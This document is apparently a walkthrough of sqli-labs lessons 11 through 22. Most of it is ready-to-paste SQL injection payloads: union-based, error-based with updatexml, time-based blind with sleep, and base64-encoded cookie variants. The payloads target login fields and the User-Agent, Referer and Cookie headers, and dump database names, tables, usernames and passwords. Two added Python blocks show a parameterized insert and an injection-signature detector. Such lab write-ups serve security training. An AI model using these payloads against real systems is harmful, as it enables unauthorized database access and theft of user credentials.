Both the submitted account and password are 123; the SQL statement that gets executed is as follows. It can be bypassed with a universal password (an always-true condition). Note that the comment here cannot use --+.
payload (submitted via POST):
uname=admin' order by 2#&passwd=123&submit=Submit
//echoes normally
uname=admin' order by 3#&passwd=123&submit=Submit
//echo is abnormal, so the column count is 2
uname=-admin' union select 1,2#&passwd=123&submit=Submit
//both 1 and 2 are echo positions; admin must be changed to a value that does not exist, such as -admin
//dump database:
uname=-admin' union select 1,database()#&passwd=123&submit=Submit
//dump tables:
uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=123&submit=Submit
//dump columns:
uname=-admin' union select 1, group_concat(column_name) from information_schema.columns where table_name='users' #&passwd=123&submit=Submit
//dump contents:
uname=-admin' union select 1,group_concat(username) from users #&passwd=&submit=Submit
uname=-admin' union select 1,group_concat(password) from users #&passwd=&submit=Submit
Basically the same as less-11, except that the closing changes to ("").
payload:
//dump database:
uname=-admin") union select 1,database()#&passwd=123&submit=Submit
//dump tables:
uname=-admin") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=123&submit=Submit
//dump columns:
uname=-admin") union select 1, group_concat(column_name) from information_schema.columns where table_name='users' #&passwd=123&submit=Submit
//dump contents:
uname=-admin") union select 1,group_concat(username) from users #&passwd=&submit=Submit
uname=-admin") union select 1,group_concat(password) from users #&passwd=&submit=Submit
The closing is (''), and nothing is echoed back, so use error-based blind injection.
payload:
//dump database:
uname=admin') and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=&submit=Submit
//dump tables:
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=&submit=Submit
//dump columns:
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&passwd=&submit=Submit
//dump contents:
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)#&passwd=&submit=Submit
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)#&passwd=&submit=Submit
Basically the same as less-13, except that the closing is "".
payload:
//dump database:
uname=admin" and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=&submit=Submit
//dump tables:
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=&submit=Submit
//dump columns:
uname=admin"and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&passwd=&submit=Submit
//dump contents:
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)#&passwd=&submit=Submit
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)#&passwd=&submit=Submit
The closing is '' and no error is returned, so use time-based blind injection. Note:
if(length(database())=8,1,sleep(3)) means: when the length is correct, the page is returned immediately; when it is wrong, the response is delayed three seconds.
if(length(database())=8,sleep(3),1) means: when the length is correct, the response is delayed three seconds; when it is wrong, the page is returned immediately.
payload:
//find the database name length:
uname=admin' and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit
//dump database:
uname=admin' and if(substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit
//dump tables:
uname=admin' and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))#&passwd=11&submit=Submit
//dump columns:
uname=admin' and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))#&passwd=11&submit=Submit
//dump contents:
uname=admin' and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))#&passwd=11&submit=Submit
Basically the same as less-15; the closing changes to ("").
payload:
//find the database name length:
uname=admin")and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit
//delayed three seconds, so the length is 8
//dump database:
uname=admin") and if(substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit
//dump tables:
uname=admin")and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))#&passwd=11&submit=Submit
//dump columns:
uname=admin")and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))#&passwd=11&submit=Submit
//dump contents:
uname=admin") and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))#&passwd=11&submit=Submit
There is a pitfall here: the database first runs a query on uname and only allows the update if that user exists, which means uname has no SQL injection; only passwd is injectable.
The closing for passwd is ''.
payload:
//dump database:
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit
//dump tables:
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&submit=Submit
//dump columns:
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&submit=Submit
//dump contents:
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(login) from users),0x7e),1)#&submit=Submit
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)#&submit=Submit
//dumping this table's contents seems to cause a problem: You can't specify target table 'users' for update in FROM clause
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(email_id) from emails),0x7e),1)#&submit=Submit
//dumping the emails table causes no problem, which shows the syntax is not wrong; rather, the program applied a policy.
Injection in HTTP headers:
Appending a ' to the User-Agent causes an error, which shows this is an injection point.
Looking at the source, uname and passwd are both run through the check_input() function, so injecting via the uname and passwd inputs will not work; but in the code we see
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`,
`username`) VALUES ('$uagent', '$IP', $uname)"; mysql_query($insert);
which inserts the User-Agent and IP into the database, so can we use this for injection? First, a correct account and password must be entered here to pass the account/password check and reach the part that processes uagent.
payload:
//dump database:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',1, updatexml(1,concat(0x7e,database(),0x7e),1))#
//dump tables:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
//dump columns:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#
//dump contents:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',updatexml(1,concat(0x7e,(select group_concat(password) from users ),0x7e),1))#
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',updatexml(1,concat(0x7e,(select group_concat(login) from users ),0x7e),1))#
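A defensive counterpart to the INSERT quoted above, added here and not part of the original write-up or of sqli-labs: a constructed in-memory SQLite stand-in for the uagents table shows the string-built statement beside a parameterized insert, so a quote arriving in User-Agent is stored as data instead of terminating the SQL literal. All function names are assumptions; only the table and column names come from the page.

```python
import sqlite3

# Constructed stand-in for the lab's security.uagents table (same three columns
# as the quoted INSERT); in-memory so the example runs offline.
def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE uagents (uagent TEXT, ip_address TEXT, username TEXT)")
    return conn

def build_insert_unsafe(uagent: str, ip: str, uname: str) -> str:
    """Builds the statement the way the lab's PHP does: header values are pasted
    straight into the SQL text. Returned, not executed, so the effect is visible."""
    return ("INSERT INTO uagents (uagent, ip_address, username) "
            f"VALUES ('{uagent}', '{ip}', '{uname}')")

def record_visit_safe(conn: sqlite3.Connection, uagent: str, ip: str, uname: str) -> None:
    """Hardened form: placeholders keep User-Agent, IP and username as data, so
    check_input() on uname/passwd is no longer the only line of defence."""
    conn.execute(
        "INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)",
        (uagent, ip, uname),
    )
    conn.commit()

def stored_uagent(conn: sqlite3.Connection, uname: str) -> str:
    """Reads back what was actually stored for a username ('' if no row)."""
    row = conn.execute("SELECT uagent FROM uagents WHERE username = ?", (uname,)).fetchone()
    return row[0] if row else ""

def quote_breaks_out(uagent: str) -> bool:
    """True when a header value terminates the quoted literal in the unsafe SQL:
    with clean inputs the built statement holds exactly six single quotes."""
    return build_insert_unsafe(uagent, "127.0.0.1", "admin").count("'") != 6

if __name__ == "__main__":
    db = open_db()
    # Constructed header value carrying the same kind of stray quote the write-up appends.
    ua = "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1'"
    print(build_insert_unsafe(ua, "127.0.0.1", "admin"))
    record_visit_safe(db, ua, "127.0.0.1", "admin")
    print(stored_uagent(db, "admin") == ua)
```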
About the same as less-18.
Appending a ' to the Referer produces an error, which shows injection exists.
payload:
//dump database:
Referer: http://127.0.0.1/sqli/less-19/',1, updatexml(1,concat(0x7e,database(),0x7e),1))#
//dump tables:
Referer: http://127.0.0.1/sqli/less-19/',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
//dump columns:
Referer: http://127.0.0.1/sqli/less-19/',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#
//dump contents:
Referer: http://127.0.0.1/sqli/less-19/',updatexml(1,concat(0x7e,(select group_concat(password) from users ),0x7e),1))#
Appending a ' to the cookie produces an error, which shows the cookie is an injection point, and it has echo.
payload:
Cookie: uname=admin' order by 3#; security_level=0
//normal
Cookie: uname=admin' order by 4#; security_level=0
//abnormal, so the column count is 3
Cookie: uname=-admin' union select 1,2,3#; security_level=0
//1, 2 and 3 are all echo positions
//dump database:
Cookie: uname=-admin' union select 1,2,database()#; security_level=0
//dump tables:
Cookie:uname=-admin' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')#; security_level=0
//dump columns:
Cookie:uname=-admin' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')#; security_level=0
//dump contents:
Cookie:uname=-admin' union select 1,2,(select group_concat(password) from users)#; security_level=0
Basically the same as less-20; the closing is (''), except that the cookie value has been base64-encoded, and error-based injection must be used.
A legal Base64 string has the following characteristics: its length is a multiple of 4; its characters come only from A-Z, a-z, 0-9, +, / and =, 65 characters in total; and if = appears, it must be at the end.
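An added detection example, not from the original write-up, that serves this Base64 note and the if/sleep() note in the time-based section: it checks a uname cookie against the three Base64 rules above, decodes it, and scans the plaintext for the union/updatexml/sleep/information_schema patterns these lessons rely on. All function and signature names are assumptions, and the sample values are constructed.

```python
import base64
import re

# Shape rules exactly as listed above: length a multiple of 4, characters only from
# A-Z a-z 0-9 + / =, and '=' only as trailing padding.
_B64_SHAPE = re.compile(r"[A-Za-z0-9+/]*={0,2}")

# Signatures of the techniques this write-up uses (union, updatexml, sleep,
# information_schema, trailing comment). Case-insensitive: the lessons mix if/If.
_SIGNATURES = {
    "union_select": re.compile(r"union\s+select", re.I),
    "error_based": re.compile(r"updatexml\s*\(", re.I),
    "time_based": re.compile(r"sleep\s*\(", re.I),
    "schema_probe": re.compile(r"information_schema\.", re.I),
    "comment_terminator": re.compile(r"(#|--\s|--\+)\s*$"),
}

def is_valid_base64(s: str) -> bool:
    """True if s has the shape of a legal Base64 string per the rules above."""
    return len(s) % 4 == 0 and _B64_SHAPE.fullmatch(s) is not None

def encode_cookie(plaintext: str) -> str:
    """Helper to build constructed cookie values the way the lab does."""
    return base64.b64encode(plaintext.encode("utf-8")).decode("ascii")

def suspicious_tokens(value: str) -> list:
    """Names of the injection signatures present in one parameter value."""
    return [name for name, rx in _SIGNATURES.items() if rx.search(value)]

def inspect_cookie_uname(raw: str) -> dict:
    """Validate a base64-carried uname cookie and scan its plaintext.
    Malformed input is reported instead of being handed to the database layer."""
    if not is_valid_base64(raw):
        return {"valid_base64": False, "decoded": None, "hits": ["malformed_base64"]}
    try:
        decoded = base64.b64decode(raw, validate=True).decode("utf-8", errors="replace")
    except ValueError:  # binascii.Error is a ValueError (e.g. impossible padding)
        return {"valid_base64": False, "decoded": None, "hits": ["malformed_base64"]}
    return {"valid_base64": True, "decoded": decoded, "hits": suspicious_tokens(decoded)}

if __name__ == "__main__":
    # Constructed samples: a benign login and a time-based probe of the kind shown above.
    for plain in ("admin", "admin' and if(length(database())=8,sleep(3),1)#"):
        print(inspect_cookie_uname(encode_cookie(plain)))
    print(inspect_cookie_uname("not%20base64"))
```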
payload:
//dump database:
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSM=; security_level=0
//dump tables:
Cookie:uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknKSwweDdlKSwxKSM=; security_level=0
//dump columns:
Cookie:uname=YWRtaW4nKWFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycpLDB4N2UpLDEpIw==; security_level=0
//dump contents:
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUpIGZyb20gdXNlcnMpLDB4N2UpLDEpIw==; security_level=0
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gdXNlcnMpLDB4N2UpLDEpIw==; security_level=0
//for the plaintext see less-13; base64-encode it directly with Burp's built-in encoder.
Basically the same as less-21; the closing is "".
payload:
//dump database:
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpLDEpIw==; security_level=0
//dump tables:
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpLDB4N2UpLDEpIw==; security_level=0
//dump columns:
Cookie: uname=YWRtaW4iYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJyksMHg3ZSksMSkj; security_level=0
//dump field contents:
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSB1c2VycyksMHg3ZSksMSkj; security_level=0
uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSB1c2VycyksMHg3ZSksMSkj; security_level=0
//for the plaintext see less-14; base64-encode it directly with Burp's built-in encoder.